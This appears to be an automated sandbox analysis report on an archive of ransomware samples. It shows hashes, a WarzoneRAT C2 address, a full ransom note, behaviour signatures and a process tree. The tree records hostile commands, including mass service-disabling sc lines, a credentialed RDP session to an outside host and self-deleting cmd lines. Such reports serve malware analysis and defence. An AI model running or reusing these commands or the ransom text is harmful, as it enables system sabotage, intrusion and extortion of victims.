Analysis

  • max time kernel
    200s
  • max time network
    202s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
  • submitted
    28-10-2024 16:48

General

  • Target

    RNSM00414.7z

  • Size

    6.8MB

  • MD5

    4ba05bc378b38b52acaadfe09cf3122e

  • SHA1

    3693e47da4d01d389ea59bb4451494710fa5b17b

  • SHA256

    7d3f9f20a5bcdb6e2e9d53685af5b7f46d3604d5d9a9539cf8b35c8c41addd45

  • SHA512

    bef4cec704fe2a89be5594083902549e9fbf6a6d2123f26f19a4a9cb41ababea6adeb13e3c157710dbbe7d4dee1fac27b94fcfeb3e5e488af3cf62a9f4a87f03

  • SSDEEP

    98304:sGntqpfpepXXmmNMQPHZk9FnTW+1O1kOeJEP41yCtaJkLBjhnEvh7k9h5KDZXXiS:sCtSepnZBk9FTW+Up4ttHKWK0KqC5

Malware Config

Extracted

  • Family
    warzonerat
  • C2
    194.68.59.48:2318

Extracted

  • Path
    C:\Users\Admin\Desktop\HOW-TO-DECRYPT-gn9cj.txt
  • Ransom Note

    [+] What happened? [+]
    Your files are encrypted, and currently unavailable. You can check it: all files on you computer has extension *.gn9cj
    By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant get back your data (NEVER).

    [+] What guarantees? [+]
    Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests.
    To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
    If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.

    [+] How to get access on website? [+]
    Using a TOR browser!
    - Download and install TOR browser from this site: hxxps://torproject.org/
    - Open our website: hxxp://khfsk3ffg3av3rha.onion
    - Follow the on-screen instructions

    Extension name: *.gn9cj

    -----------------------------------------------------------------------------------------

    !!! DANGER !!!
    DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.
    !!! !!! !!!
    ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) will make everything possible for restoring, but please do not interfere.
    !!! !!! !!!

Signatures

  • Disables service(s) 3 TTPs
  • Hades Ransomware

    Ransomware family attributed to Evil Corp APT first seen in late 2020.

  • Hades family
  • Hades payload 6 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Warzonerat family
  • CryptOne packer 1 IoCs

    Detects CryptOne packer defined in NCC blogpost.

  • Renames multiple (171) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Warzone RAT payload 4 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 14 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 64 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 39 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Time Discovery 1 TTPs 1 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00414.7z"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2936
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4840
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /1
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:4176
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:220
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2936
      • C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.MSIL.Encoder.vho-30b877a266dc809a469155ab42de7ad0e225e15777870b03a049ddb1123217d4.exe
        HEUR-Trojan-Ransom.MSIL.Encoder.vho-30b877a266dc809a469155ab42de7ad0e225e15777870b03a049ddb1123217d4.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2304
      • C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.Win32.Blocker.gen-248eabc9c97d8c4994c26c88cf1806ea9274eb187e3eb0bae7ae8035c7f3b189.exe
        HEUR-Trojan-Ransom.Win32.Blocker.gen-248eabc9c97d8c4994c26c88cf1806ea9274eb187e3eb0bae7ae8035c7f3b189.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:748
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 748 -s 1320
          4⤵
          • Program crash
          PID:3792
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 748 -s 1912
          4⤵
          • Program crash
          PID:4644
      • C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe
        HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        PID:2668
      • C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.Win32.Generic-5e58a1576d022944a3f18102fe5ff04a8b4d56918003b53b914beece11e63868.exe
        HEUR-Trojan-Ransom.Win32.Generic-5e58a1576d022944a3f18102fe5ff04a8b4d56918003b53b914beece11e63868.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2636
      • C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.exe
        Trojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2648
        • C:\Users\Admin\RDP6\ConnectionClient.exe
          "C:\Users\Admin\RDP6\ConnectionClient.exe" -server fmea.homepc.it -user rileva1 -psw newfmea -color 32 -alttab 0 -remoteapp off -seamless off -width 1024 -height 768 -printer off -com off -smartcard off -preview on -disk on -smartsizing 0 -localtb 32
          4⤵
          • UAC bypass
          • Checks computer location settings
          • Executes dropped EXE
          • Checks whether UAC is enabled
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:3736
          • C:\Users\Admin\RDP6\TsCredentials.exe
            "C:\Users\Admin\RDP6\TsCredentials.exe" fmea.homepc.it /Delete
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4676
          • C:\Users\Admin\RDP6\TsCredentials.exe
            "C:\Users\Admin\RDP6\TsCredentials.exe" fmea.homepc.it rileva1 newfmea
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2528
          • C:\Windows\SysWOW64\mstsc.exe
            "C:\Windows\SysWOW64\mstsc.exe" "C:\Users\Admin\RDP6\Session.rdp"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3280
            • C:\Windows\system32\mstsc.exe
              "C:\Windows\SysWOW64\mstsc.exe" "C:\Users\Admin\RDP6\Session.rdp"
              6⤵
              • Enumerates connected drives
              • Checks SCSI registry key(s)
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious use of SetWindowsHookEx
              PID:4704
          • C:\Users\Admin\RDP6\TsCredentials.exe
            "C:\Users\Admin\RDP6\TsCredentials.exe" fmea.homepc.it /Delete
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2760
      • C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Cryrar.hev-3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f.exe
        Trojan-Ransom.Win32.Cryrar.hev-3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3756
        • C:\Windows\system32\cmd.exe
          "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6491.tmp\64A2.bat C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Cryrar.hev-3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3880
          • C:\Windows\system32\ipconfig.exe
            ipconfig /release
            5⤵
            • Gathers network information
            PID:4568
          • C:\Windows\system32\ipconfig.exe
            ipconfig /renew
            5⤵
            • Gathers network information
            PID:4548
          • C:\Windows\system32\ipconfig.exe
            ipconfig /flushdns
            5⤵
            • Gathers network information
            PID:5020
          • C:\Windows\system32\netsh.exe
            netsh int tcp show global
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:1612
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global chimney=enabled
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:2892
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global autotuninglevel=normal
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:4508
          • C:\Windows\system32\netsh.exe
            netsh interface tcp set heuristics disabled
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:1104
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global dca=enabled
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:832
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global netdma=enabled
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:4436
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global rss=enabled
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:4948
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global rsc=enabled
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:4912
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global ecncapability=disabled
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:2236
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global initialRto=2000
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:2028
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global timestamps=disabled
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Time Discovery
            PID:1940
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global nonsackrttresiliency=disabled
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:3112
          • C:\Windows\system32\netsh.exe
            netsh int tcp set global maxsynretransmissions=2
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:3572
          • C:\Windows\system32\sc.exe
            SC CONFIG "ALG" start= disabled
            5⤵
            PID:4092
          • C:\Windows\system32\sc.exe
            sc stop "ALG"
            5⤵
            • Launches sc.exe
            PID:4956
          • C:\Windows\system32\sc.exe
            sc config "bthserv" start= disabled
            5⤵
            • Launches sc.exe
            PID:1596
          • C:\Windows\system32\sc.exe
            sc stop "bthserv"
            5⤵
            • Launches sc.exe
            PID:4800
          • C:\Windows\system32\sc.exe
            sc config "BthHFSrv" start= disabled
            5⤵
            • Launches sc.exe
            PID:3984
          • C:\Windows\system32\sc.exe
            sc stop "BthHFSrv"
            5⤵
            • Launches sc.exe
            PID:3860
          • C:\Windows\system32\sc.exe
            sc config "PeerDistSvc" start= disabled
            5⤵
            • Launches sc.exe
            PID:3172
          • C:\Windows\system32\sc.exe
            sc stop "PeerDistSvc"
            5⤵
            • Launches sc.exe
            PID:3404
          • C:\Windows\system32\sc.exe
            sc config "CertPropSvc" start= disabled
            5⤵
            • Launches sc.exe
            PID:1316
          • C:\Windows\system32\sc.exe
            sc stop "CertPropSvc"
            5⤵
            • Launches sc.exe
            PID:3520
          • C:\Windows\system32\sc.exe
            sc config "VaultSvc" start= disabled
            5⤵
            • Launches sc.exe
            PID:624
          • C:\Windows\system32\sc.exe
            sc stop "VaultSvc"
            5⤵
            • Launches sc.exe
            PID:468
          • C:\Windows\system32\sc.exe
            sc config "CryptSvc" start= disabled
            5⤵
            • Launches sc.exe
            PID:4364
          • C:\Windows\system32\sc.exe
            sc stop "CryptSvc"
            5⤵
            • Launches sc.exe
            PID:952
          • C:\Windows\system32\sc.exe
            sc config "TrkWks" start= disabled
            5⤵
            • Launches sc.exe
            PID:1224
          • C:\Windows\system32\sc.exe
            sc stop "TrkWks"
            5⤵
            • Launches sc.exe
            PID:2256
          • C:\Windows\system32\sc.exe
            sc config "DiagTrack" start= disabled
            5⤵
            • Launches sc.exe
            PID:4972
          • C:\Windows\system32\sc.exe
            sc stop "DiagTrack"
            5⤵
            • Launches sc.exe
            PID:1124
          • C:\Windows\system32\sc.exe
            sc config "WPCSvc" start= disabled
            5⤵
            • Launches sc.exe
            PID:1600
          • C:\Windows\system32\sc.exe
            sc stop "WPCSvc"
            5⤵
            • Launches sc.exe
            PID:388
          • C:\Windows\system32\sc.exe
            sc config "HomeGroupListener" start= disabled
            5⤵
            • Launches sc.exe
            PID:3288
          • C:\Windows\system32\sc.exe
            sc stop "HomeGroupListener"
            5⤵
            • Launches sc.exe
            PID:1104
          • C:\Windows\system32\sc.exe
            sc config "HomeGroupProvider" start= disabled
            5⤵
            • Launches sc.exe
            PID:3016
          • C:\Windows\system32\sc.exe
            sc stop "HomeGroupProvider"
            5⤵
            • Launches sc.exe
            PID:832
          • C:\Windows\system32\sc.exe
            sc config "hidserv" start= disabled
            5⤵
            • Launches sc.exe
            PID:2404
          • C:\Windows\system32\sc.exe
            sc stop "hidserv"
            5⤵
            • Launches sc.exe
            PID:4924
          • C:\Windows\system32\sc.exe
            sc config "vmicvss" start= disabled
            5⤵
            • Launches sc.exe
            PID:1892
          • C:\Windows\system32\sc.exe
            sc stop "vmicvss"
            5⤵
            • Launches sc.exe
            PID:2284
          • C:\Windows\system32\sc.exe
            sc config "vmictimesync" start= disabled
            5⤵
            • Launches sc.exe
            PID:664
          • C:\Windows\system32\sc.exe
            sc stop "vmictimesync"
            5⤵
            • Launches sc.exe
            PID:4500
          • C:\Windows\system32\sc.exe
            sc config "vmicrdv" start= disabled
            5⤵
            • Launches sc.exe
            PID:4236
          • C:\Windows\system32\sc.exe
            sc stop "vmicrdv"
            5⤵
            • Launches sc.exe
            PID:4644
          • C:\Windows\system32\sc.exe
            sc config "vmicheartbeat" start= disabled
            5⤵
            • Launches sc.exe
            PID:1664
          • C:\Windows\system32\sc.exe
            sc stop "vmicheartbeat"
            5⤵
            • Launches sc.exe
            PID:2916
          • C:\Windows\system32\sc.exe
            sc config "vmicshutdown" start= disabled
            5⤵
            • Launches sc.exe
            PID:692
          • C:\Windows\system32\sc.exe
            sc stop "vmicshutdown"
            5⤵
            • Launches sc.exe
            PID:4076
          • C:\Windows\system32\sc.exe
            sc config "vmicguestinterface" start= disabled
            5⤵
            • Launches sc.exe
            PID:3512
          • C:\Windows\system32\sc.exe
            sc stop "vmicguestinterface"
            5⤵
            • Launches sc.exe
            PID:1876
          • C:\Windows\system32\sc.exe
            sc config "vmickvpexchange" start= disabled
            5⤵
            • Launches sc.exe
            PID:1568
          • C:\Windows\system32\sc.exe
            sc stop "vmickvpexchange"
            5⤵
            • Launches sc.exe
            PID:2352
          • C:\Windows\system32\sc.exe
            sc config "SharedAccess" start= disabled
            5⤵
            • Launches sc.exe
            PID:2964
          • C:\Windows\system32\sc.exe
            sc stop "SharedAccess"
            5⤵
            • Launches sc.exe
            PID:4516
          • C:\Windows\system32\sc.exe
            sc config "IEEtwCollectorService" start= disabled
            5⤵
            • Launches sc.exe
            PID:1916
          • C:\Windows\system32\sc.exe
            sc stop "IEEtwCollectorService"
            5⤵
            • Launches sc.exe
            PID:1608
          • C:\Windows\system32\sc.exe
            sc config "iphlpsvc" start= disabled
            5⤵
            • Launches sc.exe
            PID:1428
          • C:\Windows\system32\sc.exe
            sc stop "iphlpsvc"
            5⤵
            • Launches sc.exe
            PID:1316
          • C:\Windows\system32\sc.exe
            sc config "MSiSCSI" start= disabled
            5⤵
            • Launches sc.exe
            PID:3520
          • C:\Windows\system32\sc.exe
            sc stop "MSiSCSI"
            5⤵
            • Launches sc.exe
            PID:4020
          • C:\Windows\system32\sc.exe
            sc config "NetTcpPortSharing" start= disabled
            5⤵
            • Launches sc.exe
            PID:3392
          • C:\Windows\system32\sc.exe
            sc stop "NetTcpPortSharing"
            5⤵
            PID:1224
          • C:\Windows\system32\sc.exe
            sc config "Netlogon" start= disabled
            5⤵
            • Launches sc.exe
            PID:3288
          • C:\Windows\system32\sc.exe
            sc stop "Netlogon"
            5⤵
            • Launches sc.exe
            PID:3016
          • C:\Windows\system32\sc.exe
            sc config "napagent" start= disabled
            5⤵
            • Launches sc.exe
            PID:2796
          • C:\Windows\system32\sc.exe
            sc stop "napagent"
            5⤵
            • Launches sc.exe
            PID:4720
          • C:\Windows\system32\sc.exe
            sc config "CscService" start= disabled
            5⤵
            • Launches sc.exe
            PID:4948
          • C:\Windows\system32\sc.exe
            sc stop "CscService"
            5⤵
            • Launches sc.exe
            PID:2804
          • C:\Windows\system32\sc.exe
            sc config "PNRPsvc" start= disabled
            5⤵
            • Launches sc.exe
            PID:2676
          • C:\Windows\system32\sc.exe
            sc stop "PNRPsvc"
            5⤵
            • Launches sc.exe
            PID:464
          • C:\Windows\system32\sc.exe
            sc config "p2pimsvc" start= disabled
            5⤵
            • Launches sc.exe
            PID:4208
          • C:\Windows\system32\sc.exe
            sc stop "p2pimsvc"
            5⤵
            • Launches sc.exe
            PID:2180
          • C:\Windows\system32\sc.exe
            sc config "RemoteAccess" start= disabled
            5⤵
            • Launches sc.exe
            PID:2528
          • C:\Windows\system32\sc.exe
            sc stop "RemoteAccess"
            5⤵
            • Launches sc.exe
            PID:3572
          • C:\Windows\system32\sc.exe
            sc config "wuauserv" start= disabled
            5⤵
            • Launches sc.exe
            PID:2352
          • C:\Windows\system32\sc.exe
            sc stop "wuauserv"
            5⤵
            • Launches sc.exe
            PID:2964
          • C:\Windows\system32\sc.exe
            sc config "wcncsvc" start= disabled
            5⤵
            • Launches sc.exe
            PID:2648
          • C:\Windows\system32\sc.exe
            sc stop "wcncsvc"
            5⤵
            • Launches sc.exe
            PID:428
      • C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Foreign.ofow-2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae.exe
        Trojan-Ransom.Win32.Foreign.ofow-2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4404
        • C:\ProgramData\images.exe
          "C:\ProgramData\images.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1376
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3716
      • C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exe
        Trojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exe
        3⤵
        • Executes dropped EXE
        PID:2004
        • C:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement
          C:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement /go
          4⤵
          • Executes dropped EXE
          PID:852
          • C:\Windows\SYSTEM32\cmd.exe
            cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement" & del "C:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement" & rd "C:\Users\Admin\AppData\Roaming\AccessRendezvous\"
            5⤵
            PID:2444
            • C:\Windows\system32\waitfor.exe
              waitfor /t 10 pause /d y
              6⤵
              PID:4828
            • C:\Windows\system32\attrib.exe
              attrib -h "C:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement"
              6⤵
              • Views/modifies file attributes
              PID:3756
        • C:\Windows\SYSTEM32\cmd.exe
          cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exe" & del "C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exe" & rd "C:\Users\Admin\Desktop\00414\"
          4⤵
          PID:2008
          • C:\Windows\system32\waitfor.exe
            waitfor /t 10 pause /d y
            5⤵
            PID:3700
          • C:\Windows\system32\attrib.exe
            attrib -h "C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exe"
            5⤵
            • Views/modifies file attributes
            PID:2216
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
    1⤵
    PID:2392
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 748 -ip 748
    1⤵
    PID:388
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 748 -ip 748
    1⤵
    PID:4500
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:4112
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Documents\HOW-TO-DECRYPT-gn9cj.txt
    1⤵
    PID:3820

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
    • Filesize
      174B
    • MD5
      119ca34bd8a50ef617f474f56bec89d2
    • SHA1
      f04e05e6877439b38f7196ce180b1b83471134d6
    • SHA256
      c7340b72b2b49f6d216b5793f89dcf146a001fe16947ea9b44c51319d7db508a
    • SHA512
      77ed344d9490b76e3c9d7266d35f0d403c4ab0b3a273a082da665cf053b57bdf935b49cecc498a381409ce16c48476fa80c3836ba60267e69331f34f8208014b
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
    • Filesize
      170B
    • MD5
      cbad59f2a877a24a3e3436391e6e7dbd
    • SHA1
      7c3a4713faf280a0b9316db3ff141edf0d5ca53a
    • SHA256
      ebddb02cf43dfd1f1f05d0052048ac3dfdf160b0ba71d55ddda576a0ddffa4c2
    • SHA512
      b3a98411db61eacd61c09a9a71384c399b8d273264748d956a99ec7eac1b9cece112a107d5930db5762a852a44bd9fada07be2d8e17cd58102f4cce098a0c137
  • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
    • Filesize
      64KB
    • MD5
      d2fb266b97caff2086bf0fa74eddb6b2
    • SHA1
      2f0061ce9c51b5b4fbab76b37fc6a540be7f805d
    • SHA256
      b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
    • SHA512
      c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
  • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
    • Filesize
      4B
    • MD5
      f49655f856acb8884cc0ace29216f511
    • SHA1
      cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
    • SHA256
      7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
    • SHA512
      599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
  • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
    • Filesize
      944B
    • MD5
      6bd369f7c74a28194c991ed1404da30f
    • SHA1
      0f8e3f8ab822c9374409fe399b6bfe5d68cbd643
    • SHA256
      878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
    • SHA512
      8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
  • C:\Users\Admin\AppData\Local\Temp\6491.tmp\64A2.bat
    • Filesize
      3KB
    • MD5
      9275888ff69ac5ec63ab5d4d85378649
    • SHA1
      1027e519f7cffe07d5a32b18c6a48e0677971bca
    • SHA256
      56de06ca874d15d3dbf270ea7452c2a64c603589bf30406c1749e839fc14fe81
    • SHA512
      de9e6cd5d0dd96bd685c427fcb9eb7346b173ee842a2c907c5eca7578747ddb17b00647582d230752874050ee08fcef37ba85717fba25a856270aa5865bce9cf
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4hpuofol.lde.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\AppData\Local\Temp\aut6222.tmp

                          Filesize

                          830B

                          MD5

                          0eef69079adf48e3054047733b8bb8ad

                          SHA1

                          7efb70c86d1cb5b8c38c38b57ede1d6faf2c0dc6

                          SHA256

                          b5207a645836ac4a9d910f8db6a942a8ac6b71b876c1e1924d73205933b048c5

                          SHA512

                          37c4f96fcae947d335c348e24ddad96fd1f1a3096310701b75a546fac41ffaf7d9efa1cb69016cb0f603ca2caaa190ceb173fa227fbe7775c0bfe6a19dbb9ad4

                        • C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.MSIL.Encoder.vho-30b877a266dc809a469155ab42de7ad0e225e15777870b03a049ddb1123217d4.exe

                          Filesize

                          106KB

                          MD5

                          5022d9cf4a4195d6ff21c1cc3d827fa1

                          SHA1

                          2c8fccdff1e0f9b3114ddf35b5db168a07342db2

                          SHA256

                          30b877a266dc809a469155ab42de7ad0e225e15777870b03a049ddb1123217d4

                          SHA512

                          680607038a22e2959f7f3764a6a8ab56fc865e06a779af7a324a2d478dc7bd9c613c619ed22448064b2094dc79b925dd0fc59d277081a4055811e52cbd3ca396

